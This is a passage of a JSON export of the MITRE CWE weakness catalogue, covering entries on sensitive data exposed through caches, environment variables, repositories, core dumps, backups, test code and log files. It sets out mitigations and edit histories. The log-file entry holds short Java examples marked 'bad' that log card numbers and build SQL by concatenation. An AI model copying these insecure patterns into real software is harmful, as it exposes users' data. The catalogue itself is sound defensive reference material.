Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Caching","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Caching","attr":{"@_Date":"2020-02-24"}}]}},"525":{"attr":{"@_ID":"525","@_Name":"Use of Web Browser Cache Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application does not use an appropriate caching policy that specifies the extent to which each web page and associated form fields should be cached.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"524","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Browsers often store information in a client-side cache, which can leave behind sensitive information for other users to find and exploit, such as passwords or credit card numbers. The locations at most risk include public terminals, such as those in libraries and Internet cafes."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Protect information stored in cache."},{"Phase":["Architecture and Design","Implementation"],"Description":"Use a restrictive caching policy for forms and web pages that potentially contain sensitive information."},{"Phase":"Architecture and Design","Description":"Do not store unnecessarily sensitive information in the cache."},{"Phase":"Architecture and Design","Description":"Consider using encryption in the cache."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Browser Caching","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Browser Caching","attr":{"@_Date":"2020-02-24"}}]}},"526":{"attr":{"@_ID":"526","@_Name":"Exposure of Sensitive Information Through Environmental Variables","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Environmental variables may contain sensitive information about a remote server.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"497","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Protect information stored in environment variable from being exposed to the user."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Environmental Variables","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Environmental Variables","attr":{"@_Date":"2020-02-24"}}]}},"527":{"attr":{"@_ID":"527","@_Name":"Exposure of Version-Control Repository to an Unauthorized Control Sphere","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product stores a CVS, git, or other repository in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors.","Extended_Description":"Version control repositories such as CVS or git store version-specific metadata and other details within subdirectories. If these subdirectories are stored on a web server or added to an archive, then these could be used by an attacker. This information may include usernames, filenames, path root, IP addresses, and detailed \\"diff\\" data about how files have been changed - which could reveal source code snippets that were never intended to be made public.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Operation","Distribution","System Configuration"],"Description":"Recommendations include removing any CVS directories and repositories from the production server, disabling the use of remote CVS repositories, and ensuring that the latest CVS patches and version updates have been performed."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through CVS Repository","attr":{"@_Date":"2009-12-28"}},{"#text":"Exposure of CVS Repository to an Unauthorized Control Sphere","attr":{"@_Date":"2020-02-24"}}]}},"528":{"attr":{"@_ID":"528","@_Name":"Exposure of Core Dump File to an Unauthorized Control Sphere","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product generates a core dump file in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Protect the core dump files from unauthorized access."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM06-C","Entry_Name":"Ensure that sensitive data is not written out to disk"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak Through Core Dump Files","attr":{"@_Date":"2009-12-28"}}}},"529":{"attr":{"@_ID":"529","@_Name":"Exposure of Access Control List Files to an Unauthorized Control Sphere","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product stores access control list files in a directory or other container that is accessible to actors outside of the intended control sphere.","Extended_Description":"Exposure of these access control list files may give the attacker information about the configuration of the site or system. This information may then be used to bypass the intended security policy or identify trusted systems from which an attack can be launched.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Protect access control list files."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak Through Access Control List Files","attr":{"@_Date":"2009-12-28"}}}},"530":{"attr":{"@_ID":"530","@_Name":"Exposure of Backup File to an Unauthorized Control Sphere","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A backup file is stored in a directory or archive that is made accessible to unauthorized actors.","Extended_Description":"Often, older backup files are renamed with an extension such as .~bk to distinguish them from production files. The source code for old files that have been renamed in this manner and left in the webroot can often be retrieved. This renaming may have been performed automatically by the web server, or manually by the administrator.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"At a minimum, an attacker who retrieves this file would have all the information contained in it, whether that be database calls, the format of parameters accepted by the application, or simply information regarding the architectural structure of your site."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Policy","Description":"Recommendations include implementing a security policy within your organization that prohibits backing up web application source code in the webroot."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak Through Backup (.~bk) Files","attr":{"@_Date":"2009-12-28"}}}},"531":{"attr":{"@_ID":"531","@_Name":"Inclusion of Sensitive Information in Test Code","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Accessible test applications can pose a variety of security risks. Since developers or administrators rarely consider that someone besides themselves would even know about the existence of these applications, it is common for them to contain sensitive information or functions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"540","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Testing"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Distribution","Installation"],"Description":"Remove test code before deploying the application into production."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Examples of common issues with test applications include administrative functions, listings of usernames, passwords or session identifiers and information about the system, server or application configuration."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships, Time_of_Introduction"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Test Code","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Test Code","attr":{"@_Date":"2020-02-24"}}]}},"532":{"attr":{"@_ID":"532","@_Name":"Insertion of Sensitive Information into Log File","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Information written to log files can be of a sensitive nature and give valuable guidance to an attacker or expose sensitive user information.","Extended_Description":{"xhtml:p":["While logging all information may be helpful during development stages, it is important that logging levels be set appropriately before a product ships so that sensitive user data and system information are not accidentally exposed to potential attackers.","Different log files may be produced and stored for:"],"xhtml:ul":{"xhtml:li":["Server log files (e.g. server.log).  This can give information on whatever application left the file. Usually this can give full path names and system information, and sometimes usernames and passwords.","log files that are used for debugging",""]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"538","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Logging sensitive user data often provides attackers with an additional, less-protected path to acquiring the information."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"Consider seriously the sensitivity of the information written into log files. Do not write secrets into the log files."},{"Phase":"Distribution","Description":"Remove debug log files before deploying the application into production."},{"Phase":"Operation","Description":"Protect log files against unauthorized read/write."},{"Phase":"Implementation","Description":"Adjust configurations appropriately when software is transitioned from a debug state to production."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following code snippet, a user\'s full name and credit card number are written to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"logger.info(\\"Username: \\" + usernme + \\", CCN: \\" + ccn);"}},{"attr":{"@_Demonstrative_Example_ID":"DX-120"},"Intro_Text":"This code stores location information about the current user:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();currentUser.setLocation(locationClient.getLastLocation());catch (Exception e) {}","xhtml:br":["","","","",""],"xhtml:i":"...","xhtml:div":{"#text":"AlertDialog.Builder builder = new AlertDialog.Builder(this);builder.setMessage(\\"Sorry, this application has experienced an error.\\");AlertDialog alert = builder.create();alert.show();Log.e(\\"ExampleActivity\\", \\"Caught exception: \\" + e + \\" While on User:\\" + User.toString());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}},"Body_Text":"When the application encounters an exception it will write the user object to the log. Because the user object contains location information, the user\'s location is also written to the log."},{"attr":{"@_Demonstrative_Example_ID":"DX-119"},"Intro_Text":"In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public BankAccount getUserBankAccount(String username, String accountNumber) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount userAccount = null;String query = null;try {} catch (SQLException ex) {}return userAccount;","xhtml:br":["","",""],"xhtml:div":[{"#text":"if (isAuthorizedUser(username)) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"query = \\"SELECT * FROM accounts WHERE owner = \\"+ username + \\" AND accountID = \\" + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}},{"#text":"String logMessage = \\"Unable to retrieve account information from database,\\\\nquery: \\" + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-9615","Description":"verbose logging stores admin credentials in a world-readablelog file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9615"},{"Reference":"CVE-2018-1999036","Description":"SSH password for private key stored in build log","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999036"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO13-J","Entry_Name":"Do not log sensitive information outside a trust boundary"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"215"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description, Likelihood_of_Exploit, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Description, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships, Type"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Organization":"Fortify Software","Contribution_Date":"2009-07-15","Contribution_Comment":"Portions of Mitigations, Consequences and Description derived from content submitted by Fortify Software."},"Previous_Entry_Name":[{"#text":"Information Leak Through Log Files","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Log Files","attr":{"@_Date":"2019-06-20"}},{"#text":"Inclusion of Sensitive Information in Log Files","attr":{"@_Date":"2020-02-24"}}]}},"533":{"attr":{"@_ID":"533","@_Name":"DEPRECATED: Information Exposure Through Server Log Files","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because its abstraction was too low-level.  See CWE-532.","Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under 